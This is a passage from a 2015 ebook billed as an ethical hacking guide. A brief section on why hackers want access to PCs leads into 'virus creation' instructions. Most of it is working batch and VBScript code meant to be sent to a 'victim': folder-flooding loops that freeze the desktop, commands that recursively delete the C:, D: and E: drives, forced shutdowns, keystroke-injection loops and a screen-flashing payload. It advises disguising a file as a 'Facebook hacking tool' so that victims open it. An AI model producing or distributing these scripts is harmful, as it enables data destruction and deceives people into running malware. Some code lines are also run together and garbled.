HACKERS WANT YOUR PC - Hack-X-Crypt A Straight Forward Guide Towards Ethical Hacking And Cyber Security (2015)

Hack-X-Crypt A Straight Forward Guide Towards Ethical Hacking And Cyber Security (2015)

HACKERS WANT YOUR PC

HACKERS WANT YOUR PC…

You might be thinkingthathackers don’t careabout your computer,but they do. Hackers want access to your system for many different reasons. Remember, once a hacker breaks in and plants a Trojan, the door is open for anyone to return. The hackers know this and are making money off from it. They know it’s easy to hide and very difficult to track them back once they own your PC.

Overall, the Internet is an easy place to hide. Compromised computers around the world have helped to make hiding simple. It is easy to find the last IP address from where an attack was launched, but hackers hop from many unsecured systems to hide their location before they launch attacks.

IP address is a unique address that identifies where a computer is connected to the Internet. Every computer, even yours if you’re using broadband access, has an Internet protocol (IP) address.

Over the past four years, most cyber-attacks have been launched from computers within the INDIA. However, this doesn’t mean that systems in the INDIA are the original source of the attack. A hacker in Pakistan could actually use your computer to launch a denial of service (DOS) attack. To the entire world, it might even look as if you started the attack because the hacker has hidden his tracks so that only the last “hop” can be traced

.

VIRUS CREATIONS

CREATION OF VIRUS IN NOTEPAD

Now, it’s time to administrate your computer by creating some viruses in the form of batch file. You can create various types of viruses with havingdistinct functionality. Eachandeveryviruswill affect thevictim’s computer system by the way you have coded its programming in the batch file. You can create viruses which can freeze the victim’s computer or it can also crash it.

Virus creation codes of the batch file:-
--Codes to be written in the notepad-
--Extension of the files should be ".bat" -

1.) To create a huge amount of folders on victim's desktop screen:

First of all your task is to copy the following codes in the notepad of your computer.

For opening the notepad:

·Go to run option of your computer by pressing “window+R”. ·Simply type “notepad” and click on the OK option.

CODES: @echo off
:top
md%random%
goto top.

Now when you have copied the codes in the notepad your next work is to save the text document you have created.
Go to fileoptionandsave your document by any namebut“don’tforget to keep the extension as ‘.bat’.

For example you can save your text document by the name“ujjwal.bat”

Or you can also keep your document name as “Facebook hacking tool.bat” to confuse the victim and enforce him to open the virus you have created to destroy the desktop of the victim.

When you have done saving the document just double click on the batch file to open it.

Suddenly you will see that the command prompt of the victim’s computer opened automatically and it will display large amount of codes to running in the command prompt.
After 5-10 seconds you will see that there are a huge amount of folders created automatically on the desktop of the victim and it will also leads the desktop to freeze or crash.

2.) To create more folders in C, D, and E drive of victim’s computer:-

As we have learned above to create many folders on the desktop of the victim, in the same way we can create a lot of folders in the C:, D:, and E: drives of the victims computer by applying the same method as we have followed above but there is a little amendment in the codes of the batch file of this virus.

CODES:
@echo off

:VIRUS
cd /d C:
md%random%
cd /d D:
md%random%
cd /d E:
md%random%
goto VIRUS

Copy and paste the above code in the notepad and follow the same steps as we have followed before to create more numbers of folders in the local drives of the victim’s computer.

3.) To format C, D: and E: drive of your computer:

Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" (Without quotes)
Save as "anything.bat

Double click on the virus icon.

This virus formats the C, D and E Drive in 5 Seconds.

4.) Convey your friend a little message and shut down his / her computer:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

5.) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

Open the notepad and type the following code :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500
WshShell.SendKeys "? " WScript.Sleep 500
WshShell.SendKeys "I a" WScript.Sleep 500
WshShell.SendKeys "m g" WScript.Sleep 500
WshShell.SendKeys "ood" WScript.Sleep 500
WshShell.SendKeys " th" WScript.Sleep 500
WshShell.SendKeys "ank" WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6.) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Open the notepad and type the following codes:

Set wshShell = wscript.CreateObject("WScript.Shell") do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

7.) Open Notepad continually in your friend's computer:

Open the notepad and type the following codes:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

8.) THRETEN YOUR FRIEND BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg

But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
Codes:

@echo off :a echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe Enjoy!!! Note: - some of the above given codes can harm your computer after execution so; don’t try it on your pc. You can use a test computer for it.